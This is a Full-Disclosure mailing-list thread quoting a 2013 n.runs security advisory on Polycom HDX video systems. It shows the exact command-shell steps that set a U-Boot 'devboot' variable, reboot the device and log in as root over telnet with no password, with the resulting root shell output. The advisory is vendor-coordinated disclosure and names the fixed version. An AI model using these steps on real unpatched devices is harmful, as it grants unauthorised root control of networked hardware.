I think because if/when someone enables it there is no authentication needed to remote log in as root? On Mar 16, 2013 4:32 PM, "Julius Kivimäki" <julius.kivim...@gmail.com> wrote:
> Why exactly is this a bug? > > 2013/3/15 <secur...@nruns.com> > >> n.runs AG >> http://www.nruns.com/ >> security(at)nruns.com >> n.runs-SA-2013.001 >> 15-Mar-2013 >> >> ___________________________________________________________________________ >> Vendor: Polycom, http://www.polycom.com >> Affected Products: Polycom HDX Series >> Affected Version: < 3.1.1.2 >> Vulnerability: Polycom Command Shell Grants System-Level Access >> Risk: LOW >> >> ___________________________________________________________________________ >> >> Overview: >> >> The Polycom Command Shell is a command-line based administrative interface >> to the Polycom HDX system. It can be accessed either via a RS-232 serial >> connection or via telnet on port 23. >> >> Description: >> >> The Polycom Command Shell can be used to view and also change several >> settings of the system. However it can also be used to get system-level >> access (i.e. root access) to the HDX system. The "printenv" and "setenv" >> commands can be used to read and write variables respectively which are >> stored in flash memory. >> >> The easiest way to get root access to the HDX system is to enable the >> "development mode" of the system which will then enable a telnet server >> where a root login without a password is possible. In order to enable >> the development mode, the "devboot" U-Boot environment variable must >> be set. This can be done through the Polycom Command Shell with the >> following commands: >> >> $ cu -l ttyUSB0 -s 9600 >> -> setenv othbootargs "devboot=bogus" >> -> reboot >> reboot, are you sure? <y,n> y >> >> This will reboot the system and enable a telnet server where a login as >> root is possible. >> >> $ telnet 192.168.0.218 >> Trying 192.168.0.218... >> Connected to 192.168.0.218. >> Escape character is '^]'. >> >> hdx7000.lan login: root >> ## Error: "vidoutsize" not defined >> # id >> uid=0(root) gid=0(root) >> # uname -a >> Linux hdx7000.lan 2.6.18.1.p2.14 #1 PREEMPT Wed Feb 3 10:25:31 CST >> 2010 >> ppc unknown >> # >> >> Impact: >> >> Someone with legitimate access to the Polycom Command Shell can get >> direct system-level access to the underlying embedded Linux system. >> This can be used to further analyze the system. >> >> Solution: >> >> Polycom released version 3.1.1.2 of the HDX software which fixes this >> issue. It can be downloaded from the Polycom Support page at >> http://support.polycom.com. >> >> ___________________________________________________________________________ >> >> Credit: >> Bug found by Moritz Jodeit of n.runs AG. >> >> ___________________________________________________________________________ >> >> Unaltered electronic reproduction of this advisory is permitted. For all >> other reproduction or publication, in printing or otherwise, contact >> secur...@nruns.com for permission. Use of the advisory constitutes >> acceptance for use in an "as is" condition. All warranties are excluded. >> In no event shall n.runs be liable for any damages whatsoever including >> direct, indirect, incidental, consequential, loss of business profits or >> special damages, even if n.runs has been advised of the possibility of >> such damages. >> >> Copyright 2013 n.runs AG. All rights reserved. Terms of use apply. >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/